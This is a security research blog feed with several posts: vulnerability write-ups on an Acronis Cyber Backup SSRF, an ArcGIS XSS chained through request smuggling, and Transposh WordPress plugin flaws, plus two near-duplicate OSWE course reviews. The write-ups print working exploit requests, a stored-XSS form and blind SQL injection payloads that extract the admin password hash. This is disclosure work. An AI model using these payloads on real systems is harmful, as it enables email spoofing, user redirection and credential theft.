Normal view

There are new articles available, click to refresh the page.
Before yesterdayRCE Security

CVE-2020-16171: Exploiting Acronis Cyber Backup for Fun and Emails

14 September 2020 at 00:00

CVE-2020-16171: Exploiting Acronis Cyber Backup for Fun and Emails

You have probably read one or more blog posts about SSRFs, many being escalated to RCE. While this might be the ultimate goal, this post is about an often overlooked impact of SSRFs: application logic impact.

This post will tell you the story about an unauthenticated SSRF affecting Acronis Cyber Backup up to v12.5 Build 16341, which allows sending fully customizable emails to any recipient by abusing a web service that is bound to localhost. The fun thing about this issue is that the emails can be sent as backup indicators, including fully customizable attachments. Imagine sending Acronis “Backup Failed” emails to the whole organization with a nice backdoor attached to it? Here you go.

Root Cause Analysis

So Acronis Cyber Backup is essentially a backup solution that offers administrators a powerful way to automatically backup connected systems such as clients and even servers. The solution itself consists of dozens of internally connected (web) services and functionalities, so it’s essentially a mess of different C/C++, Go, and Python applications and libraries.

The application’s main web service runs on port 9877 and presents you with a login screen:

Now, every hacker’s goal is to find something unauthenticated. Something cool. So I’ve started to dig into the source code of the main web service to find something cool. Actually, it didn’t take me too long to discover that something in a method called make_request_to_ams:

# WebServer/wcs/web/temp_ams_proxy.py:

def make_request_to_ams(resource, method, data=None):
    port = config.CONFIG.get('default_ams_port', '9892')
    uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)
[...]

The main interesting thing here is the call to get_ams_address(request.headers), which is used to construct a Uri. The application reads out a specific request header called Shard within that method:

def get_ams_address(headers):
    if 'Shard' in headers:
        logging.debug('Get_ams_address address from shard ams_host=%s', headers.get('Shard'))
        return headers.get('Shard')  # Mobile agent >= ABC5.0

When having a further look at the make_request_to_ams call, things are getting pretty clear. The application uses the value from the Shard header in a urllib.request.urlopen call:

def make_request_to_ams(resource, method, data=None):
[...]
    logging.debug('Making request to AMS %s %s', method, uri)
    headers = dict(request.headers)
    del headers['Content-Length']
    if not data is None:
        headers['Content-Type'] = 'application/json'
    req = urllib.request.Request(uri,
                                 headers=headers,
                                 method=method,
                                 data=data)
    resp = None
    try:
        resp = urllib.request.urlopen(req, timeout=wcs.web.session.DEFAULT_REQUEST_TIMEOUT)
    except Exception as e:
        logging.error('Cannot access ams {} {}, error: {}'.format(method, resource, e))
    return resp

So this is a pretty straight-forward SSRF including a couple of bonus points making the SSRF even more powerful:

  • The instantiation of the urllib.request.Request class uses all original request headers, the HTTP method from the request, and the even the whole request body.
  • The response is fully returned!

The only thing that needs to be bypassed is the hardcoded construction of the destination Uri since the API appends a semicolon, a port, and a resource to the requested Uri:

uri = 'http://{}:{}{}'.format(get_ams_address(request.headers), port, resource)

However, this is also trivially easy to bypass since you only need to append a ? to turn those into parameters. A final payload for the Shard header, therefore, looks like the following:

Shard: localhost?

Finding Unauthenticated Routes

To exploit this SSRF we need to find a route which is reachable without authentication. While most of CyberBackup’s routes are only reachable with authentication, there is one interesting route called /api/ams/agents which is kinda different:

# WebServer/wcs/web/temp_ams_proxy.py:
_AMS_ADD_DEVICES_ROUTES = [
    (['POST'], '/api/ams/agents'),
] + AMS_PUBLIC_ROUTES

Every request to this route is passed to the route_add_devices_request_to_ams method:

def setup_ams_routes(app):
[...]
    for methods, uri, *dummy in _AMS_ADD_DEVICES_ROUTES:
        app.add_url_rule(uri,
                         methods=methods,
                         view_func=_route_add_devices_request_to_ams)
[...]

This in return does only check whether the allow_add_devices configuration is enabled (which is the standard config) before passing the request to the vulnerable _route_the_request_to_ams method:

               
def _route_add_devices_request_to_ams(*dummy_args, **dummy_kwargs):
    if not config.CONFIG.get('allow_add_devices', True):
        raise exceptions.operation_forbidden_error('Add devices')

    return _route_the_request_to_ams(*dummy_args, **dummy_kwargs)

So we’ve found our attackable route without authentication here.

Sending Fully Customized Emails Including An Attachment

Apart from doing meta-data stuff or similar, I wanted to entirely fire the SSRF against one of Cyber Backup’s internal web services. There are many these, and there are a whole bunch of web services whose authorization concept solely relies only on being callable from the localhost. Sounds like a weak spot, right?

One interesting internal web service is listening on localhost port 30572: the Notification Service. This service offers a variety of functionality to send out notifications. One of the provided endpoints is /external_email/:

@route(r'^/external_email/?')
class ExternalEmailHandler(RESTHandler):
    @schematic_request(input=ExternalEmailValidator(), deserialize=True)
    async def post(self):
        try:
            error = await send_external_email(
                self.json['tenantId'], self.json['eventLevel'], self.json['template'], self.json['parameters'],
                self.json.get('images', {}), self.json.get('attachments', {}), self.json.get('mainRecipients', []),
                self.json.get('additionalRecipients', [])
            )
            if error:
                raise HTTPError(http.BAD_REQUEST, reason=error.replace('\n', ''))
        except RuntimeError as e:
            raise HTTPError(http.BAD_REQUEST, reason=str(e))

I’m not going through the send_external_email method in detail since it is rather complex, but this endpoint essentially uses parameters supplied via HTTP POST to construct an email that is send out afterwards.

The final working exploit looks like the following:

POST /api/ams/agents HTTP/1.1
Host: 10.211.55.10:9877
Shard: localhost:30572/external_email?
Connection: close
Content-Length: 719
Content-Type: application/json;charset=UTF-8

{"tenantId":"00000000-0000-0000-0000-000000000000",
"template":"true_image_backup",
"parameters":{
"what_to_backup":"what_to_backup",
"duration":2,
"timezone":1,
"start_time":1,
"finish_time":1,
"backup_size":1,
"quota_servers":1,
"usage_vms":1,
"quota_vms":1,"subject_status":"subject_status",
"machine_name":"machine_name",
"plan_name":"plan_name",
"subject_hierarchy_name":"subject_hierarchy_name",
"subject_login":"subject_login",
"ams_machine_name":"ams_machine_name",
"machine_name":"machine_name",
"status":"status","support_url":"support_url"
},
"images":{"test":"./critical-alert.png"},
"attachments":{"test.html":"PHU+U29tZSBtb3JlIGZ1biBoZXJlPC91Pg=="},
"mainRecipients":["[email protected]"]}

This involves a variety of “customizations” for the email including a base64-encoded attachments value. Issuing this POST request returns null:

but ultimately sends out the email to the given mainRecipients including some attachments:

Perfectly spoofed mail, right ;-) ?

The Fix

Acronis fixed the vulnerability in version v12.5 Build 16342 of Acronis Cyber Backup by changing the way that get_ams_address gets the actual Shard address. It now requires an additional authorization header with a JWT that is passed to a method called resolve_shard_address:

# WebServer/wcs/web/temp_ams_proxy.py:
def get_ams_address(headers):
    if config.is_msp_environment():
        auth = headers.get('Authorization')
        _bearer_prefix = 'bearer '
        _bearer_prefix_len = len(_bearer_prefix)
        jwt = auth[_bearer_prefix_len:]
        tenant_id = headers.get('X-Apigw-Tenant-Id')
        logging.info('GET_AMS: tenant_id: {}, jwt: {}'.format(tenant_id, jwt))
        if tenant_id and jwt:
            return wcs.web.session.resolve_shard_address(jwt, tenant_id)

While both values tenant_id and jwt are not explicitly validated here, they are simply used in a new hardcoded call to the API endpoint /api/account_server/tenants/ which ultimately verifies the authorization:

# WebServer/wcs/web/session.py:
def resolve_shard_address(jwt, tenant_id):
    backup_account_server = config.CONFIG['default_backup_account_server']
    url = '{}/api/account_server/tenants/{}'.format(backup_account_server, tenant_id)

    headers = {
        'Authorization': 'Bearer {}'.format(jwt)
    }

    from wcs.web.proxy import make_request
    result = make_request(url,
                          logging.getLogger(),
                          method='GET',
                          headers=headers).json()
    kind = result['kind']
    if kind not in ['unit', 'customer']:
        raise exceptions.unsupported_tenant_kind(kind)
    return result['ams_shard']

Problem solved.

Smuggling an (Un)exploitable XSS

13 November 2020 at 00:00

Smuggling an (Un)exploitable XSS

This is the story about how I’ve chained a seemingly uninteresting request smuggling vulnerability with an even more uninteresting header-based XSS to redirect network-internal web site users without any user interaction to arbitrary pages. This post also introduces a 0day in ArcGis Enterprise Server.

However, this post is not about how request smuggling works. If you’re new to this topic, have a look at the amazing research published by James Kettle, who goes into detail about the concepts.

Smuggling Requests for Different Response Lengths

So what I usually do when having a look at a single application is trying to identify endpoints that are likely to be proxied across the infrastructure - endpoints that are commonly proxied are for example API endpoints since those are usually infrastructurally separated from any front-end stuff. While hunting on a private HackerOne program, I’ve found an asset exposing an API endpoint that was actually vulnerable to a CL.TE-based request smuggling by using a payload like the following:

POST /redacted HTTP/1.1
Content-Type: application/json
Content-Length: 132
Host: redacted.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Foo: bar

Transfer-Encoding: chunked

4d
{"GeraetInfoId":"61e358b9-a2e8-4662-ab5f-56234a19a1b8","AppVersion":"2.2.40"}
0

GET / HTTP/1.1
Host: redacted.com
X: X

As you can see here, I’m smuggling a simple GET request against the root path of the webserver on the same vhost. So in theory, if the request is successfully smuggled, we’d see the root page as a response instead of the originally queried API endpoint.

To verify that, I’ve spun up a TurboIntruder instance using a configuration that issues the payload a hundred times:

While TuroboIntruder was running, I’ve manually refreshed the page a couple of times to trigger (simulate) the vulnerability. Interestingly, the attack seemed to work quite well, since there were actually two different response sizes, whereof one was returning the original response of the API:

And the other returned the start page:

This confirms the request smuggling vulnerability against myself. Pretty cool so far, but self-exploitation isn’t that much fun.

Poisoning Links Through ArcGis’ X-Forwarded-Url-Base Header

To extend my attack surface for the smuggling issue, I’ve noticed that the same server was also running an instance of the ArcGis Enterprise Server under another directory. So I’ve reviewed its source code for vulnerabilities that I could use to improve the request smuggling vulnerability. I’ve stumbled upon an interesting constellation affecting its generic error handling:

The ArcGIS error handler accepts a customized HTTP header called X-Forwarded-Url-Base that is used for the base of all links on the error page, but only if it is combined with another customized HTTP header called X-Forwarded-Request-Context. The value supplied to X-Forwarded-Request-Context doesn’t really matter as long as it is set.

So a minified request to exploit this issue against the ArcGis’ /rest/directories route looks like the following:

GET /rest/directories HTTP/1.1
Host: redacted.com
X-Forwarded-Url-Base: https://www.rce.wf/cat.html?
X-Forwarded-Request-Context: HackerOne

This simply poisons all links on the error page with a reference to my server at https://www.rce.wf/cat.html? (note the appended ? which is used to get rid off the automatically appended URL string /rest/services):

While this already looks like a good candidate to be chained with the smuggling, it still requires user interaction by having the user (victim) to click on any link on the error page.

However, I was actually looking for something that does not require any user interaction.

A Seemingly Unexploitable ArcGis XSS

You’ve probably guessed it already. The very same header combination as previously shown is also vulnerable to a reflected XSS. Using a payload like the following for the X-Forwarded-Url-Base:

X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>alert(1)</script>
X-Forwarded-Request-Context: HackerOne

leads to an alert being injected into the error page:

Now, a header-based XSS is usually not exploitable on its own, but it becomes easily exploitable when chained with a request smuggling vulnerability because the attacker is able to fully control the request.

While popping alert boxes on victims that are visiting the vulnerable server is funny, I was looking for a way to maximize my impact to claim a critical bounty. The solution: redirection.

If you’d now use a payload like the following:

X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>document.location='https://www.rce.wf/cat.html';</script>
X-Forwarded-Request-Context: HackerOne

…you’d now be able to redirect users.

Connecting the Dots

The full exploit looked like the following:

POST /redacted HTTP/1.1
Content-Type: application/json
Content-Length: 278
Host: redacted.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Foo: bar

Transfer-Encoding: chunked

4d
{"GeraetInfoId":"61e358b9-a2e8-4662-ab5f-56234a19a1b8","AppVersion":"2.2.40"}
0

GET /redacted/rest/directories HTTP/1.1
Host: redacted.com
X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>document.location='https://www.rce.wf/cat.html';</script>
X-Forwarded-Request-Context: HackerOne
X: X

While executing this attack at around 1000 requests per second, I was able to actually see some interesting hits on my server:

After doing some lookups I was able to confirm that those hits were indeed originating from the program’s internal network.

Mission Completed. Thanks for the nice critical bounty :-)

OSWE Course And Exam Review

22 April 2022 at 00:00

Introduction

This is a review of the Advanced Web Attacks and Exploitation (WEB-300) course provided by Offensive-Security. I’ve taken this course because I was curious about what secret tricks this course will offer for its money, especially considering that I’ve done a lot of source code reviews in different languages already.

This course is designed to develop, or expand, your exploitation skills in web application penetration testing and exploitation research. This is not an entry level course–it is expected that you are familiar with basic web technologies and scripting languages. We will dive into, read, understand, and write code in several languages, including but not limited to JavaScript, PHP, Java, and C#.

I got this course as part of my Offensive-Security Learn Unlimited subscription, which includes all of their courses (except for the EXP-401) and unlimited exam attempts. Luckily, I only needed one attempt to pass the exam and get my OSWE certification.

The Courseware & the Labs

I’d say it’s a typical Offensive-Security course. It comes with hundreds of written pages and hours of video content explaining every vulnerability class in such incredible detail, which is fantastic if you’re new to certain things. But the courseware still assumes a technically competent reader proficient with programming concepts such as object orientation, so I don’t recommend taking this course without prior programming knowledge.

You will also get access to their labs to follow the course materials. These labs consist of Linux and Windows machines that you will pwn along the course, and they are fun! You will touch on all the big vulnerability classes and some lesser-known ones that you usually don’t encounter in your day-to-day BugBounty business. Some of these are:

  • Authentication Bypasses of all kinds
  • Type Juggling
  • SQL Injection
  • Server-Side JavaScript Injection
  • Deserialization
  • Template Injection
  • Cross-Site Scripting (this was unexpected in an RCE context!)
  • Server-Side Request Forgery
  • Prototype Pollution
  • Classic command injection

It took me roughly a week to get through all videos and labs, mostly because I was already familiar with most of the vulnerability classes and content. My most challenging ones were the type juggling (this is some awesome stuff!) and prototype pollution. I also decided not to go the extra miles; however, I’d still recommend this to everyone who is relatively new to source code review and exploitation and wants to practice their skills.

The Exam

Overview

The exam is heavily time-constrained. You have 47 hours and 45 minutes to work through 2 target machines, where you have full access to the application’s source code. But be prepared that the source code to review might be a lot - good time management is crucial here. After the pure hacking time, you will have another 24 hours to submit your exam documentation.

The Proctoring

But before actually being able to read a lot of source code, you have to go through the proctoring setup with the proctors themselves. You have to be 15 minutes early to the party to show your government ID, walk them through your room and make sure that they can correctly monitor (all of) your screens. You are also not allowed to have any additional computers or mobile phones in the same room.

The proctoring itself wasn’t a real problem. The proctors have always been friendly and responsive. Note that if you intend to leave the room (even to visit your toilet), you have to let them know when you leave and when you return to your desk. But you do not have to wait for their confirmation - so no toilet incidents are expected ;-) If you intend to stay away for a more extended period (sleep ftw.), they will pause the VPN connection.

Basic Machine Setup

After finishing the proctoring setup at around 12:00, the real fun started. Offensive-Security recommends using their provided Kali VMs, but I decided to go with my native macOS instead. Be aware that if you’d choose to go this way, Offensive-Security does not provide you with any technical support (other than VPN issues). I’ve used the following software for the exam:

  • macOS Monterey 12.3.1
  • Viscosity for the VPN connection
  • Microsoft Remote Desktop to connect to the exam machines
  • Notion as my cheatsheet (Yes, you are allowed to use any notes during the exam)
  • BurpSuite Community for all the hacking (You are not allowed to use the Pro version!)
  • Python for all my scripting works

The exam machines have a basic setup of everything you need to start your journey. You don’t need any additional tools (auto-exploitation tools such as sqlmap are forbidden anyways). Another thing: you are not allowed to remotely mount or copy any of the application’s source code to your local machine to use other tools such as the JetBrains suite to start debugging. You have to do this with the tools provided - so make sure that you’ve read the course materials carefully for your debugging setup and you’re familiar with the used IDEs.

Exam Goal

The goal of the exam is to pwn two independent machines using a single script - choose whatever scripting language you’re comfortable with. This means your script should be able to do all the exploitation steps in just one run, from zero to hero. If your script fails to auto-exploit the machine, it counts as a fail (you might still get some partial points, but it might not be enough in the end). You also have to submit two flags for the authentication bypass (35 points) and for the RCE (15 points). You need to have at least 85 out of 100 points to pass the exam point-wise.

Pwn #1

Once I was familiar with the remote environment, I started to look at target machine #1. It took me roughly 4 hours to identify all the necessary vulnerabilities to get the RCE. Next up: Automation. I started to write my Python script to auto-exploit both issues, but it took much longer than expected. Why? I struggled with the reliability of my script, which for some reason, only worked on every second run. After 2.5 hours of optimizations, I finally got my script working with a 10/10 success rate.

I’ve submitted all the flags, ultimately getting me the first 50 points. At that point, I also started to collect screenshots for the documentation part of the exam.

After I got everything, I went to sleep for about 10 hours (that’s important for me to keep a clear mind), and already having half of the required points got me a calm night.

Pwn #2

After I had breakfast on the second day, I started to look at machine #2, which was a bit harder than the first one. It took me roughly half an hour to spot vulnerability #2 (so the RCE part), but I still had to find the authentication bypass. Unfortunately, that also took longer than expected because I’ve followed a rabbit hole for about two hours until I’ve noticed that it wasn’t exploitable. But still, after around 6 hours of hacking, I was able to identify the entire bug chain and exploit it. I’ve submitted both flags, getting me an overall 100 out of 100 points - this was my happy moment!

I wrote the Python exploit for auto-exploitation relatively quickly this time since it was structurally entirely different from machine #1. I also started to collect all the screenshots for my documentation. I went to sleep for another 10 hours.

Documentation

On the last day, my exam was about to end at 11:45, and I started early at 08:00 to be able to double-check my scripts, my screenshots, etc. I improved my Python scripts and added some leet hacker output to them without breaking them (yay!). I finished that part at around 10:00 and had almost 2 hours left in the exam lab. So I started to do my documentation right away and noticed (somewhat last minute) that I was missing two screenshots, and trust me, they are so important!

I informed the proctor to end my exam, and I then had another 24 hours to submit my documentation. The entire documentation took me roughly 8 hours to complete - I’m a perfectionist, and this part always takes me the most time to finish. I sent in the documentation on the same day and completed my exam.

A couple of days later, I received the awaited happy mail from Offensive-Security saying that I’ve passed the exam

netcup-xss

Who Should Take This Course?

The course itself is excellent in its content, presentation, and lab-quality. I haven’t seen any comparable course out there, and while many people are claiming that you can get all of it cheaper using Udemy courses, they are only partially correct. Yes, you’ll find a lot of courses about discovering and exploiting vulnerabilities in black box scenarios, but the AWAE targets a different audience. It is mostly about teaching you the source code’ish way of finding vulnerabilities. Where else do you have the chance to learn how to discover and exploit a Type Juggling Issue? It is barely possible without access to the source code. Active exploitation is a minor part of this course and is done manually without automation tools.

So if you do have programming skills already and are interested in strengthening your vulnerability discovery skills on source code review engagements, then this course might be the one for you. I have 5+ years of experience in auditing, primarily PHP and Java applications, and found this course to be challenging in many (but not all) chapters. However, this course still helped me sharpen my view of the allegedly minor but impactful coding errors, which can result from just a single missing equal sign.

But suppose you’ve never touched the initially mentioned bug classes, and you have also never touched on different programming languages and concepts such as object orientation. In that case, you should spend some time on practical programming first before buying this course.

AWAE Course and OSWE Exam Review

22 April 2022 at 00:00

Introduction

This is a review of the Advanced Web Attacks and Exploitation (WEB-300) course and its OSWE exam by Offensive-Security. I’ve taken this course because I was curious about what secret tricks this course will offer for its money, especially considering that I’ve done a lot of source code reviews in different languages already.

This course is designed to develop, or expand, your exploitation skills in web application penetration testing and exploitation research. This is not an entry level course–it is expected that you are familiar with basic web technologies and scripting languages. We will dive into, read, understand, and write code in several languages, including but not limited to JavaScript, PHP, Java, and C#.

I got this course as part of my Offensive-Security Learn Unlimited subscription, which includes all of their courses (except for the EXP-401) and unlimited exam attempts. Luckily, I only needed one attempt to pass the exam and get my OSWE certification.

The Courseware & the Labs

I’d say it’s a typical Offensive-Security course. It comes with hundreds of written pages and hours of video content explaining every vulnerability class in such incredible detail, which is fantastic if you’re new to certain things. But the courseware still assumes a technically competent reader proficient with programming concepts such as object orientation, so I don’t recommend taking this course without prior programming knowledge.

You will also get access to their labs to follow the course materials. These labs consist of Linux and Windows machines that you will pwn along the course, and they are fun! You will touch on all the big vulnerability classes and some lesser-known ones that you usually don’t encounter in your day-to-day BugBounty business. Some of these are:

  • Authentication Bypasses of all kinds
  • Type Juggling
  • SQL Injection
  • Server-Side JavaScript Injection
  • Deserialization
  • Template Injection
  • Cross-Site Scripting (this was unexpected in an RCE context!)
  • Server-Side Request Forgery
  • Prototype Pollution
  • Classic command injection

It took me roughly a week to get through all videos and labs, mostly because I was already familiar with most of the vulnerability classes and content. My most challenging ones were the type juggling (this is some awesome stuff!) and prototype pollution. I also decided not to go the extra miles; however, I’d still recommend this to everyone who is relatively new to source code review and exploitation and wants to practice their skills.

The Exam

Overview

The exam is heavily time-constrained. You have 47 hours and 45 minutes to work through your target machines, where you have full access to the application’s source code. But be prepared that the source code to review might be a lot - good time management is crucial here. After the pure hacking time, you will have another 24 hours to submit your exam documentation.

The Proctoring

But before actually being able to read a lot of source code, you have to go through the proctoring setup with the proctors themselves. You have to be 15 minutes early to the party to show your government ID, walk them through your room and make sure that they can correctly monitor (all of) your screens. You are also not allowed to have any additional computers or mobile phones in the same room.

The proctoring itself wasn’t a real problem. The proctors have always been friendly and responsive. Note that if you intend to leave the room (even to visit your toilet), you have to let them know when you leave and when you return to your desk. But you do not have to wait for their confirmation - so no toilet incidents are expected ;-) If you intend to stay away for a more extended period (sleep ftw.), they will pause the VPN connection.

Basic Machine Setup

After finishing the proctoring setup at around 12:00, the real fun started. Offensive-Security recommends using their provided Kali VMs, but I decided to go with my native macOS instead. Be aware that if you’d choose to go this way, Offensive-Security does not provide you with any technical support (other than VPN issues). I’ve used the following software for the exam:

  • macOS Monterey 12.3.1
  • Viscosity for the VPN connection
  • Microsoft Remote Desktop to connect to the exam machines
  • Notion as my cheatsheet (Yes, you are allowed to use any notes during the exam)
  • BurpSuite Community for all the hacking (You are not allowed to use the Pro version!)
  • Python for all my scripting works

The exam machines come in a group of two, which means you’ll get one development machine to which you’ll have full access and one “production” machine which you don’t have complete access. You’ll have to do all your research and write your exploit chain on the development machine and afterward perform your exploit against the production machine, which holds the required flags.

The development machines have a basic setup of everything you need to start your journey. You don’t need any additional tools (auto-exploitation tools such as sqlmap are forbidden anyways). Another thing: you are not allowed to remotely mount or copy any of the application’s source code to your local machine to use other tools such as the JetBrains suite to start debugging. You have to do this with the tools provided - so make sure that you’ve read the course materials carefully for your debugging setup and you’re familiar with the used IDEs.

Exam Goal

The goal of the exam is to pwn these independent production machines using a single script - choose whatever scripting language you’re comfortable with. This means your script should be able to do all the exploitation steps in just one run, from zero to hero. If your script fails to auto-exploit the machine, it counts as a fail (you might still get some partial points, but it might not be enough in the end). You need to have at least 85 out of 100 points to pass the exam point-wise.

Pwn #1

Once I was familiar with the remote environment, I started to look at target machine #1. It took me roughly 4 hours to identify all the necessary vulnerabilities. Next up: Automation. I started to write my Python script to auto-exploit both issues, but it took much longer than expected. Why? I struggled with the reliability of my script, which for some reason, only worked on every second run. After 2.5 hours of optimizations, I finally got my script working with a 10/10 success rate.

I’ve submitted all the flags, ultimately getting me the first 50 points. At that point, I also started to collect screenshots for the documentation part of the exam.

After I got everything, I went to sleep for about 10 hours (that’s important for me to keep a clear mind), and already having half of the required points got me a calm night.

Pwn #2

After I had breakfast on the second day, I started to look at machine #2, which was a bit harder than the first one. It took me roughly half an hour to spot vulnerability #2, but I still had to find the vulnerability #1. Unfortunately, that also took longer than expected because I’ve followed a rabbit hole for about two hours until I’ve noticed that it wasn’t exploitable. But still, after around 6 hours of hacking, I was able to identify the entire bug chain and exploit it. I’ve submitted both flags, getting me an overall 100 out of 100 points - this was my happy moment!

I wrote the Python exploit for auto-exploitation relatively quickly this time since it was structurally entirely different from machine #1. I also started to collect all the screenshots for my documentation. I went to sleep for another 10 hours.

Documentation

On the last day, my exam was about to end at 11:45, and I started early at 08:00 to be able to double-check my scripts, my screenshots, etc. I improved my Python scripts and added some leet hacker output to them without breaking them (yay!). I finished that part at around 10:00 and had almost 2 hours left in the exam lab. So I started to do my documentation right away and noticed (somewhat last minute) that I was missing two screenshots, and trust me, they are so important!

I informed the proctor to end my exam, and I then had another 24 hours to submit my documentation. The entire documentation took me roughly 8 hours to complete - I’m a perfectionist, and this part always takes me the most time to finish. I sent in the documentation on the same day and completed my exam.

A couple of days later, I received the awaited happy mail from Offensive-Security saying that I’ve passed the exam

netcup-xss

Who Should Take This Course?

The course itself is excellent in its content, presentation, and lab-quality. I haven’t seen any comparable course out there, and while many people are claiming that you can get all of it cheaper using Udemy courses, they are only partially correct. Yes, you’ll find a lot of courses about discovering and exploiting vulnerabilities in black box scenarios, but the AWAE targets a different audience. It is mostly about teaching you the source code’ish way of finding vulnerabilities. Where else do you have the chance to learn how to discover and exploit a Type Juggling Issue? It is barely possible without access to the source code. Active exploitation is a minor part of this course and is done manually without automation tools.

So if you do have programming skills already and are interested in strengthening your vulnerability discovery skills on source code review engagements, then this course might be the one for you. I have 5+ years of experience in auditing, primarily PHP and Java applications, and found this course to be challenging in many (but not all) chapters. However, this course still helped me sharpen my view on how small coding errors can result in impactful bugs by just leaving out a single equal sign.

But suppose you’ve never touched the initially mentioned bug classes, and you have also never touched on different programming languages and concepts such as object orientation. In that case, you should spend some time on practical programming first before buying this course.

WordPress Transposh: Exploiting a Blind SQL Injection via XSS

22 July 2022 at 00:00

Introduction

You probably have read about my recent swamp of CVEs affecting a WordPress plugin called Transposh Translation Filter, which resulted in more than $30,000 in bounties:

Here’s the story about how you could chain three of these CVEs to go from unauthenticated visitor to admin.

Part 1: CVE-2022-2461 - Weak Default Configuration

So the first issue arises when you add Transposh as a plugin to your WordPress site; it comes with a weak default configuration that allows any user (aka Anonymous) to submit new translation entries using the ajax action tp_translation:

This effectively means that an attacker could already influence the (translated) content on a WordPress site, which is shown to all visitors.

Part 2: CVE-2021-24911 - Unauthenticated Stored Cross-Site Scripting

The same ajax action tp_translation can also be used to permanently place arbitrary JavaScript into the Transposh admin backend using the following payload:

<html>
  <body>
    <form action="http://[host]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="tp&#95;translation" />
      <input type="hidden" name="ln0" value="en" />
      <input type="hidden" name="sr0" value="0" />
      <input type="hidden" name="items" value="1" />
      <input type="hidden" name="tk0" value="xss&lt;script&gt;alert&#40;1337&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="tr0" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

When an administrator now visits either Transposh’s main dashboard page at /wp-admin/admin.php?page=tp_main or the Translation editor tab at /wp-admin/admin.php?page=tp_editor, then they’ll execute the injected arbitrary JavaScript:

At this point, you can already do a lot of stuff on the backend, but let’s escalate it further by exploiting a seemingly less severe authenticated SQL Injection.

Part 3: CVE-2022-25811 - Authenticated SQL Injections

So this is probably the most exciting part, although the SQL Injections alone only have a CVSS score of 6.8 because they are only exploitable using administrative permissions. Overall, we’re dealing with a blind SQL Injection here, which can be triggered using a simple sleep payload:

/wp-admin/admin.php?page=tp_editor&orderby=lang&orderby=lang&order=asc,(SELECT%20(CASE%20WHEN%20(1=1)%20THEN%20SLEEP(10)%20ELSE%202%20END))

This results in a nice delay of the response proving the SQL Injection:

To fully escalate this chain, let’s get to the most interesting part.

How to (Quickly) Exploit a Blind SQL Injection via Cross-Site Scripting

Approach

Have you ever thought about how to exploit a blind SQL Injection via JavaScript? You might have read my previous blog article, where I used a similar bug chain, but with an error-based SQL Injection. That one only required a single injection payload to exfiltrate the admin user’s password, which is trivially easy. However, to exploit a blind SQL Injection, you typically need hundreds, probably thousands of boolean (or time-based) comparisons to exfiltrate data. The goal here is the same: extracting the administrator’s password from the database.

Now, you might think: well, you could use a boolean comparison and iterate over each character of the password. However, since those hashed passwords (WordPress uses the pHpass algorithm to create passwords) are typically 30 characters long (excluding the first four static bytes $P$B) and consist of alphanumeric characters including some special chars (i.e. $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/), going through all the possible ASCII characters from 46 (“.”) to 122 (lower-capital “z”) would require you to send around 76 requests per character which could result in 76*30 = 2280 requests.

This is a lot and will require the victim to stay on the page for quite a while.

So let’s do it a bit smarter with only around 320 requests, which is around 84% fewer requests. Yes, you might still find more optimization potential in my following approach, but I find 84% to be enough here.

Transposh’s Sanitization?!

While doing the source code review to complete this chain, I stumbled upon a useless attempt to filter special characters for the vulnerable order and orderBy parameters. It looks like they decided to only filter for FILTER_SANITIZE_SPECIAL_CHARS which translates to "<>&:

$orderby = (!empty(filter_input(INPUT_GET, 'orderby', FILTER_SANITIZE_SPECIAL_CHARS)) ) ? filter_input(INPUT_GET, 'orderby', FILTER_SANITIZE_SPECIAL_CHARS) : 'timestamp';
$order = (!empty(filter_input(INPUT_GET, 'order', FILTER_SANITIZE_SPECIAL_CHARS)) ) ? filter_input(INPUT_GET, 'order', FILTER_SANITIZE_SPECIAL_CHARS) : 'desc';

It’s still a limitation, but easy to work around: we’re just going to replace the required comparison characters < and > with a between x and y. We don’t actually care about " and & since the payload doesn’t really require them.

Preparing The Test Cases

The SQL Injection payload that can be used looks like the following (thanks to sqlmap for the initial payload!):

(SELECT+(
  CASE+WHEN+(
    ORD(MID((SELECT+IFNULL(CAST(user_pass+AS+NCHAR),0x20)+FROM+wordpress.wp_users+WHERE+id%3d1+ORDER+BY+user_pass+LIMIT+0,1),1,1))
    +BETWEEN+1+AND+122)+
    THEN+1+ELSE+2*(SELECT+2+FROM+wordpress.wp_users)+END))

I’ve split the payload up for readability reasons here. Let me explain its core components:

  • The ORD() (together with the MID) walks the user_pass string which is returned by the subquery character by character. This means we’ll get the password char by char. I’ve also added a WHERE id=1 clause to ensure we’re just grabbing the password of WordPress’s user id 1, which is usually the administrator of the instance.
  • The CASE WHEN –> BETWEEN 1 and 122 part validates whether each returned character matches an ordinal between 1 and 122.
  • The THEN –> ELSE part makes the difference in the overall output and the datapoint we will rely on when exploiting this with a Boolean-based approach.

The False Case

Let’s see how we can differentiate the responses to the BETWEEN x and y part. We do already know that the first character of a WordPress password is $ (ASCII 36), so let’s take this to show how the application reacts.

The payload /wp-admin/admin.php?page=tp_editor&orderby=lang&orderby=lang&order=asc,(SELECT+(CASE+WHEN+(ORD(MID((SELECT+IFNULL(CAST(user_pass+AS+NCHAR),0x20)+FROM+wordpress.wp_users+WHERE+id%3d1+ORDER+BY+user_pass+LIMIT+0,1),1,1))+BETWEEN+100+AND+122)+THEN+1+ELSE+2*(SELECT+2+FROM+wordpress.wp_users)+END)) performs a BETWEEN 100 and 122 test which results in the following visible output:

The True Case

The payload /wp-admin/admin.php?page=tp_editor&orderby=lang&orderby=lang&order=asc,(SELECT+(CASE+WHEN+(ORD(MID((SELECT+IFNULL(CAST(user_pass+AS+NCHAR),0x20)+FROM+wordpress.wp_users+WHERE+id%3d1+ORDER+BY+user_pass+LIMIT+0,1),1,1))+BETWEEN+1+AND+122)+THEN+1+ELSE+2*(SELECT+2+FROM+wordpress.wp_users)+END)) in return performs a BETWEEN 1 and 122 check and returns a different visible output:

As you can see on the last screenshot, in the true case, the application will show the Bulk actions dropdown alongside the translated strings. This string will be our differentiator!

